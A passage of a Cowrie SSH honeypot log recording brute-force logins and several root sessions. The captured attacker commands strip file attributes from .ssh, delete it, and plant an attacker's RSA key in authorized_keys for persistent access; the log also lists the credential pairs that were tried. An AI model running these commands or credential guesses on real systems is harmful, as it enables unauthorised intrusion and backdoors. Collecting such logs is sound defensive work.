12-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:27:03.683589Z","src_ip":"103.100.209.195","session":"04be0e44a14f"}
{"eventid":"cowrie.session.connect","src_ip":"8.137.121.98","src_port":46102,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3d3f5e11ada","protocol":"ssh","message":"New connection: 8.137.121.98:46102 (1.2.3.4:22) [session: f3d3f5e11ada]","sensor":"my-vps","timestamp":"2025-09-09T00:27:03.772745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-09T00:27:03.773828Z","src_ip":"8.137.121.98","session":"f3d3f5e11ada"}
{"eventid":"cowrie.login.failed","username":"redis","password":"111111","message":"login attempt [redis/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T00:27:04.533779Z","src_ip":"103.100.209.195","session":"04be0e44a14f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:27:05.741525Z","src_ip":"103.100.209.195","session":"04be0e44a14f"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-09-09T00:27:06.836927Z","src_ip":"8.137.121.98","session":"f3d3f5e11ada"}
{"eventid":"cowrie.session.connect","src_ip":"212.16.87.26","src_port":43760,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8164ed0f02d","protocol":"ssh","message":"New connection: 212.16.87.26:43760 (1.2.3.4:22) [session: c8164ed0f02d]","sensor":"my-vps","timestamp":"2025-09-09T00:27:08.398846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:27:08.399797Z","src_ip":"212.16.87.26","session":"c8164ed0f02d"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":57574,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ed117d2dccf","protocol":"ssh","message":"New connection: 152.32.129.236:57574 (1.2.3.4:22) [session: 5ed117d2dccf]","sensor":"my-vps","timestamp":"2025-09-09T00:27:09.888705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:27:09.889768Z","src_ip":"152.32.129.236","session":"5ed117d2dccf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:27:10.152459Z","src_ip":"152.32.129.236","session":"5ed117d2dccf"}
{"eventid":"cowrie.login.failed","username":"boris","password":"0","message":"login attempt [boris/0] failed","sensor":"my-vps","timestamp":"2025-09-09T00:27:11.239632Z","src_ip":"152.32.129.236","session":"5ed117d2dccf"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:27:11.773803Z","src_ip":"8.137.121.98","session":"f3d3f5e11ada"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":43162,"dst_ip":"1.2.3.4","dst_port":22,"session":"47c5b52aa3f3","protocol":"ssh","message":"New connection: 51.250.72.176:43162 (1.2.3.4:22) [session: 47c5b52aa3f3]","sensor":"my-vps","timestamp":"2025-09-09T00:27:11.967505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:27:11.969193Z","src_ip":"51.250.72.176","session":"47c5b52aa3f3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:27:12.000577Z","src_ip":"51.250.72.176","session":"47c5b52aa3f3"}
{"eventid":"cowrie.login.failed","username":"robot","password":"robot","message":"login attempt [robot/robot] failed","sensor":"my-vps","timestamp":"2025-09-09T00:27:12.167311Z","src_ip":"51.250.72.176","session":"47c5b52aa3f3"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:27:12.502558Z","src_ip":"152.32.129.236","session":"5ed117d2dccf"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:27:13.201590Z","src_ip":"51.250.72.176","session":"47c5b52aa3f3"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:27:16.345563Z","src_ip":"212.16.87.26","session":"c8164ed0f02d"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":51546,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b7f9b67b096","protocol":"ssh","message":"New connection: 43.156.132.147:51546 (1.2.3.4:22) [session: 1b7f9b67b096]","sensor":"my-vps","timestamp":"2025-09-09T00:27:25.610873Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:27:25.611953Z","src_ip":"43.156.132.147","session":"1b7f9b67b096"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:27:25.859356Z","src_ip":"43.156.132.147","session":"1b7f9b67b096"}
{"eventid":"cowrie.login.failed","username":"huser","password":"123","message":"login attempt [huser/123] failed","sensor":"my-vps","timestamp":"2025-09-09T00:27:26.891315Z","src_ip":"43.156.132.147","session":"1b7f9b67b096"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:27:28.142609Z","src_ip":"43.156.132.147","session":"1b7f9b67b096"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":46195,"dst_ip":"1.2.3.4","dst_port":22,"session":"b105226edbca","protocol":"ssh","message":"New connection: 103.100.209.195:46195 (1.2.3.4:22) [session: b105226edbca]","sensor":"my-vps","timestamp":"2025-09-09T00:28:14.587960Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:28:14.591345Z","src_ip":"103.100.209.195","session":"b105226edbca"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:28:14.796534Z","src_ip":"103.100.209.195","session":"b105226edbca"}
{"eventid":"cowrie.login.success","username":"root","password":"123456Qwe!","message":"login attempt [root/123456Qwe!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:28:15.613878Z","src_ip":"103.100.209.195","session":"b105226edbca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:28:16.065276Z","src_ip":"103.100.209.195","session":"b105226edbca"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:28:16.066053Z","src_ip":"103.100.209.195","session":"b105226edbca"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:28:16.067473Z","src_ip":"103.100.209.195","session":"b105226edbca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:16.271736Z","src_ip":"103.100.209.195","session":"b105226edbca"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:28:16.744972Z","src_ip":"103.100.209.195","session":"b105226edbca"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:28:16.745655Z","src_ip":"103.100.209.195","session":"b105226edbca"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:28:16.955674Z","src_ip":"103.100.209.195","session":"b105226edbca"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:16.956563Z","src_ip":"103.100.209.195","session":"b105226edbca"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":46712,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e68518367ee","protocol":"ssh","message":"New connection: 103.100.209.195:46712 (1.2.3.4:22) [session: 2e68518367ee]","sensor":"my-vps","timestamp":"2025-09-09T00:28:17.155243Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:28:17.163914Z","src_ip":"103.100.209.195","session":"2e68518367ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:28:17.368250Z","src_ip":"103.100.209.195","session":"2e68518367ee"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:28:18.193527Z","src_ip":"103.100.209.195","session":"2e68518367ee"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:19.408369Z","src_ip":"103.100.209.195","session":"2e68518367ee"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":47133,"dst_ip":"1.2.3.4","dst_port":22,"session":"177541f7ce62","protocol":"ssh","message":"New connection: 103.100.209.195:47133 (1.2.3.4:22) [session: 177541f7ce62]","sensor":"my-vps","timestamp":"2025-09-09T00:28:19.608233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:28:19.608991Z","src_ip":"103.100.209.195","session":"177541f7ce62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:28:19.812230Z","src_ip":"103.100.209.195","session":"177541f7ce62"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:28:20.681725Z","src_ip":"103.100.209.195","session":"177541f7ce62"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:20.893675Z","src_ip":"103.100.209.195","session":"177541f7ce62"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:28:20.900563Z","src_ip":"103.100.209.195","session":"b105226edbca"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":52914,"dst_ip":"1.2.3.4","dst_port":22,"session":"d134dee2f4e7","protocol":"ssh","message":"New connection: 152.32.129.236:52914 (1.2.3.4:22) [session: d134dee2f4e7]","sensor":"my-vps","timestamp":"2025-09-09T00:28:32.954510Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:28:32.955212Z","src_ip":"152.32.129.236","session":"d134dee2f4e7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:28:33.150578Z","src_ip":"152.32.129.236","session":"d134dee2f4e7"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty1234!","message":"login attempt [root/Qwerty1234!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:28:33.971257Z","src_ip":"152.32.129.236","session":"d134dee2f4e7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:28:34.382214Z","src_ip":"152.32.129.236","session":"d134dee2f4e7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:28:34.382884Z","src_ip":"152.32.129.236","session":"d134dee2f4e7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:28:34.383969Z","src_ip":"152.32.129.236","session":"d134dee2f4e7"}
